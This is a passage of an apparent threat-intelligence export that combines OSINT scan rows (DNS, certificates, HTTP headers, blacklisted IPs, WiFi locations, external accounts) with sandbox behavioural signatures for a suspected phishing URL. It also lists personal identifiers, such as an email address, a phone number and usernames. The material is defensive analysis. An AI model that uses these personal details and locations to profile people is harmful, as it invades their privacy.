None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4gaVQ_1_.woff" has type "Web Open Font Format TrueType length 20712 version 1.1"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27]- [targetUID: 00000000-00002908]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00003764]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002908]\n "CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA]- [targetUID: 00000000-00002908]\n "7e80dcacf1_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "~DF6E9EB864F8E8C92C.TMP" has type "data"- Location: [%TEMP%\\~DF6E9EB864F8E8C92C.TMP]- [targetUID: 00000000-00003764]\n "YMKUF9Q6.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\YMKUF9Q6.txt]- [targetUID: 00000000-00003764]\n "CPM6V2NP.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\CPM6V2NP.txt]- [targetUID: 00000000-00002908]\n "IGBW5PPN.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\IGBW5PPN.txt]- [targetUID: 00000000-00002908]\n "js_2_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "search_2_.json" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894]- [targetUID: 00000000-00002908]\n "fontawesome-webfont_1_.eot" has type "Embedded OpenType (EOT) FontAwesome family"- [targetUID: N/A]\n "620BEF1064BD8E252C599957B3C91896" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\620BEF1064BD8E252C599957B3C91896]- [targetUID: 00000000-00002908]\n "RecoveryStore._E80B3267-2D93-11ED-AA59-08002740601A_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "Tar87F.tmp" has type "data"- Location: [%TEMP%\\Tar87F.tmp]- [targetUID: 00000000-00002908]\n "ce5327c52694093aede79fbdda65cf4496210956_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "jquery-3.1.0.min_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]'}, {u'category': u'Spyware/Information Retrieval', u'origin': u'API Call', u'identifier': u'api-113', u'name': u'Touches files in program files directory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-497', u'attck_id': u'T1083', u'relevance': 3, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\iexplore.exe.config"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\VERSION.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\API-MS-WIN-DOWNLEVEL-SHELL32-L1-1-0.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\IEFRAME.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\IPHLPAPI.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\RPCRTREMOTE.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\ieproxy.dll"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\DWMAPI.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\IEUI.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\MSHTML.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Microsoft Office\\Office14\\OUTLLIB.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Microsoft Office\\Office14\\OUTLLIB.DLL.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\sqmapi.dll"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\BCRYPT.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE.LOCAL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\APPHELP.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Microsoft Office\\Office14\\GROOVEEX.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Java\\jre1.8.0_151\\bin\\ssv.dll"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nHost: www.trustsign.com.br\nConnection: Keep-Alive\nAccept-Language: en-US"- [Source: SSL_34.74.170.74]\n\n "de3\n[[~(.E]Kjk;5IZE0$%9vH<}X"u:2\nsw/.q0>?\n?iiG?>v%R`gG~:fxOJ?v>b8e\\GS3i4VgX\nZ^4Bq#Ch7O|yn;thhrry?)NI19:~35;57y"Xg<##Ox&hTqDA:i|y5[aX2II(n:0e\nC9<vHQ"m&\nB1ON}|RTL"C@S^\'J(f"eN2$\na!3YiAez|N-j2sETgX(Rx(1D:Y\'CECP}j4K6nV0@f Vig4Lw=g.;tiBfVf~hp@-A#?\'\nH+ic NsODso2={GK%(\'}--TgUdpwNuM>:OHY*ks\'-=^t~&\nzr9\n ]3LHDX$<>c]JBI\n7wE6g;C8)10:5_o#DiRC.G;*AP\n"X*%-hn3HmtmLG&@\'}l8{=a&\\1]d)(-as%\nLW\nR.M-kN$L*\ng>m/Rg!y3T#<IZ\\"\'F|>Z{V3G`HN4\n-f)j`,\n2p62X3T&#\\V3j3z9%s8=:^1/sXr=42\\7+%\n;qz%U+#W9gp!\\h7/*vsJ+IerH4!=`~\\s_&"GGl2b+Q+PI~<>akh8[,7}#JN+rDv}}MlLI,Q-Dz:<sU\'>Ghe9[8M4-p%m*:\nX*pkZBwg<r0G`<2ZI | 34.74.170.74 |
| 2023-05-12 03:01:44 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.238): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:10:06 | Malicious IP Address | Yes | VoIPBL OpenPBX IPs | 0 | 1 | 2 | 0 | None | VOIPBL Publicly Accessible PBX List [185.199.108.153]
http://www.voipbl.org/update | 185.199.108.153 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <no ssid> (Net ID: 00:02:2D:51:66:85) | 37.7642, -122.3993 |
| 2023-05-12 02:44:42 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | panel.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:15:41:ea:93:cd:8d:62:0f:07:0f:be:37:47:74:c1:ad:1b
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 17:26:26 2022 GMT
Not After : Feb 15 17:26:25 2023 GMT
Subject: CN=panel.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:aa:4d:69:12:67:d1:ef:14:86:20:9d:cf:2c:a8:
0d:c9:a7:6c:06:2b:6c:f8:9e:1f:f7:5b:41:e3:d6:
87:ca:57:bb:98:07:35:18:67:8f:28:74:6a:04:77:
89:a0:80:85:fc:4d:2e:7a:12:ee:d9:55:9b:e8:51:
03:88:3d:06:0a:14:47:b6:c6:bf:e2:f2:6e:38:57:
77:d8:da:10:9f:18:48:30:90:76:66:83:1b:18:b6:
6d:f9:38:58:a1:cc:7b:d2:96:34:23:9b:ea:85:2c:
bb:61:4a:ef:9a:58:1e:2d:73:fc:eb:20:c5:37:d4:
7c:8e:77:66:2d:b6:0a:4e:0d:e0:f4:1d:87:9f:f3:
39:d7:d9:45:03:a6:8f:40:08:8a:3e:d5:15:b6:01:
8a:08:27:45:ff:cb:af:e5:d1:fd:28:cb:df:75:d3:
f7:db:3d:e9:43:0c:e5:b6:28:89:d2:ba:63:6c:e0:
ac:03:c0:49:9f:2c:e6:11:96:03:1a:33:a3:63:63:
dc:3b:1c:a8:9b:0f:00:ea:cb:bf:0c:39:fd:1c:40:
ab:3a:92:ca:b0:90:5c:21:ed:f1:8e:4f:9e:e7:92:
92:53:94:1d:fa:e2:36:84:fa:2a:17:63:6d:d0:c9:
16:92:48:c8:82:19:57:63:48:56:6e:6a:2e:34:87:
cc:7c:79:cf:43:dc:a4:a2:fb:e4:06:17:02:db:ef:
92:10:48:04:d1:04:89:aa:65:ee:9d:e2:a1:cd:ce:
9c:27:f6:46:3e:9e:91:90:6e:12:78:d2:cd:5e:a3:
75:48:b4:82:f5:c9:29:da:c5:bb:ac:87:af:95:fa:
f8:49:db:fe:e5:df:04:7e:92:10:6e:c8:d7:7b:93:
ef:de:5b:4f:7a:70:41:0c:59:d9:04:5e:26:57:3d:
65:af:57:00:3d:40:e4:ec:3b:92:38:0a:d1:a5:20:
31:40:89:48:9a:58:46:06:1e:56:4f:e5:25:e6:f5:
33:d9:bb:68:90:99:70:c6:a1:93:5a:22:c1:e3:ee:
da:ef:45:a4:37:18:4c:33:42:7e:6f:07:01:85:ed:
36:f3:3f:be:f6:6a:d9:3e:fe:ad:4c:8d:18:3e:0e:
49:d9:7a:95:04:47:e8:2c:a9:fe:24:7a:53:d0:af:
27:b2:85:89:f7:05:df:d8:9a:0d:56:23:cd:ee:11:
cb:31:f6:4e:3f:af:22:51:d3:a0:8f:a4:52:72:6f:
12:6d:6d:c2:7a:fe:c4:93:c1:f6:23:a9:9a:2b:35:
9d:df:e3:e9:99:57:fb:f5:e8:d9:e8:4d:a5:ec:7e:
dd:22:c5:d3:4f:c7:2d:bf:e4:09:ee:6f:cb:b6:13:
f8:ae:73
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
CE:03:E9:CB:9A:4D:5E:BB:32:45:93:FC:78:CC:A3:7F:08:26:B1:40
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:panel.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
ac:60:96:91:2c:ed:62:e3:68:ab:ed:e4:c1:61:0e:e3:90:31:
8e:31:a9:4b:46:c3:8d:c5:e0:8d:6a:1f:71:38:56:82:9c:31:
ee:2d:1e:c2:98:27:b8:9a:55:a7:78:ac:42:82:80:5a:1a:3f:
46:90:d5:fc:3f:8e:74:b4:e7:d4:76:72:66:4f:64:e7:54:46:
71:43:bb:42:84:c6:ab:aa:25:38:1c:ad:60:ca:08:fb:2f:af:
6b:e9:0e:62:15:97:73:27:ee:39:ae:11:a2:19:fc:87:93:31:
01:c6:c2:bd:5e:38:b1:3d:e5:5a:62:7e:60:8c:17:d0:3e:6e:
32:57:eb:54:28:cc:4a:0d:97:2a:6c:f6:c3:5d:8d:fc:27:99:
db:56:f3:bf:e2:b4:48:94:fb:dc:8e:3d:27:43:4b:4a:90:a7:
5c:68:44:45:9f:de:e6:ec:0b:1d:70:e4:c8:83:60:12:96:7f:
ec:53:10:4f:3d:05:06:c8:b9:0f:d6:87:14:c3:ad:47:7e:54:
4f:22:a7:90:86:28:be:cb:1b:db:56:26:75:23:0a:0e:be:e0:
7a:ad:c8:af:3f:81:81:ab:65:ab:91:6f:ac:eb:f0:ed:29:05:
3a:74:6a:ac:41:f3:d3:ea:c7:b8:d2:98:d6:a4:8f:dc:f6:59:
7a:f9:d5:0f
|
| 2023-05-12 02:55:01 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c5e66a4c91910fb-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 188.114.96.1 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | ANY (Net ID: 00:04:E2:0E:BB:DF) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:45:49 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 2 | 0 | None | {u'city': u'Chicago', u'security': {u'is_vpn': False}, u'city_geoname_id': 4887398, u'region_geoname_id': 4896861, u'country': u'United States', u'region': u'Illinois', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'CLOUDFLARENET', u'isp_name': u'Cloudflare, Inc.', u'organization_name': u'Cloudflare, Inc.', u'autonomous_system_number': 13335}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'60666', u'longitude': -97.822, u'country_code': u'US', u'timezone': {u'abbreviation': u'CDT', u'gmt_offset': -5, u'is_dst': True, u'name': u'America/Chicago', u'current_time': u'21:45:48'}, u'latitude': 37.751, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'172.67.135.9', u'continent': u'North America', u'region_iso_code': u'IL'} | 172.67.135.9 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | palnet (Category: finance)
https://www.palnet.io/@login | login |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | <no ssid> (Net ID: 00:07:40:61:40:4D) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:09:18 | Vulnerability - General | Yes | Tool - Retire.js | 0 | 0 | 4 | 0 | None | CVE-2018-14040
Score: Unknown
Description: Unknown | https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js |
| 2023-05-12 03:03:19 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0-001-0.github.io |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | ASE VISITORS (Net ID: 00:03:52:A1:3D:40) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | laethof_ipad (Net ID: 00:0C:E6:08:59:05) | 50.8897, 6.0563 |
| 2023-05-12 02:54:51 | BGP AS Membership | No | Censys | 0 | 0 | 3 | 0 | None | 396982 | 34.74.170.74 |
| 2023-05-12 03:11:25 | Physical Location | No | AbstractAPI | 0 | 0 | 3 | 0 | None | Arizona, United States | +14806242505 |
| 2023-05-12 03:03:27 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00089.github.io |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cf-mitigated: challenge | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=jsIMdWNoCwdQGyyZGyYA%2Bk%2F%2FuxOwhAu2H4z%2BlgqTotxGWPo8hqWsqluH0WQNJMNDxGIz%2FauzgzXUlj2TX7zY2FcfHDEdJ6DQfKAJa9S%2BlmMzgJ2oNDB%2FfptzTg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5e7988238a-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:53:15 | IPv6 Address | No | Mnemonic PassiveDNS | 0 | 0 | 1 | 0 | None | 2606:50c0:8000::153 | battleb0t.xyz |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | GBC_Insaat (Net ID: 00:14:C1:0B:28:CC) | 40.2024, 29.0398 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | celikpalas (Net ID: 00:12:17:70:0F:C1) | 40.2024, 29.0398 |
| 2023-05-12 02:54:13 | Open TCP Port Banner | No | Censys | 0 | 0 | 4 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5016a1cc062a51-ORD
Content-Encoding: gzip
| 2606:4700:3030::ac43:a8fc |
| 2023-05-12 03:01:42 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.210): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=u1lyJPU0WioZJ7gW30pw%2F1QYGnEvSi6VguD4iZQLy9JFxNjUYX7Kn2AvbK1RwFeWf6Bc3GtzenDe9QfSS82xeo%2BaVIIeURcDQSNP2UoyOSj%2Fo0e2kf0IgvowllGBeio%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60715ea2423d-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | ImageShack (Category: images)
https://imageshack.com/user/ayhu | ayhu |
| 2023-05-12 02:59:51 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | madler@alumni.caltech.edu | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://ocjfkdlaerq2jj64fpowvb2o3gv7gd5gvqzit3xbp6hazs5a-ipfs-dweb-link.translate.goog/?_x_tr_hp=bafybeia3mp&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp#kantonsen%40encoded.com', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_ad0_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_ad0_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_ad0_IE_EarlyTabStart_0x588_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_ad0_IESQMMUTEX_0_303"\n "IsoScope_ad0_IESQMMUTEX_0_331"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_ad0_ConnHashTable<2768>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2768"\n "Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"142.251.214.129:443"\n "142.251.214.131:443"\n "142.250.189.238:443"\n "185.199.111.153:443"\n "69.16.175.10:443"\n "142.250.189.234:443"\n "184.27.80.18:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"code.jquery.com"\n "lipis.github.io"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'".fa-cc-paypal:before {" (Indicator: "paypal")\n ".fa-paypal:before {" (Indicator: "paypal")\n ".fa-twitter-square:before {" (Indicator: "twitter")\n ".fa-twitter:before {" (Indicator: "twitter")\n ".fa-youtube-play:before {" (Indicator: "youtube")\n ".fa-youtube-square:before {" (Indicator: "youtube")\n ".fa-youtube:before {" (Indicator: "youtube")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "m_el_main_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "_D809339D-C99C-11ED-A84C-080027C98DFF_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "font-awesome_1_.css" has type "troff or preprocessor input ASCII text with very long lines"- [targetUID: N/A]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "RecoveryStore._D809339B-C99C-11ED-A84C-080027C98DFF_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "X2WYMCV5.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\X2WYMCV5.txt]- [targetUID: 00000000-00002768]\n "DEW9N13E.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\DEW9N13E.txt]- [targetUID: 00000000-00003116]\n "_E2C1FED7-C99C-11ED-A84C-080027C98DFF_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "1NX8I2I6.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\1NX8I2I6.txt]- [targetUID: 00000000-00002768]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "UX69Y2OK.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\UX69Y2OK.txt]- [targetUID: 00000000-00003116]\n "BQ7YREAH.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\BQ7YREAH.txt]- [targetUID: 00000000-00003116]\n "~DF7ADEEE89A7F7CB7A.TMP" has type "data"- Location: [%TEMP%\\~DF7ADEEE89A7F7CB7A.TMP]- [targetUID: 00000000-00002768]\n "C1BNT20A.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\C1BNT20A.txt]- [targetUID: 00000000-00002768]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "favicon_4_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "m_navigationui_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002768]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', 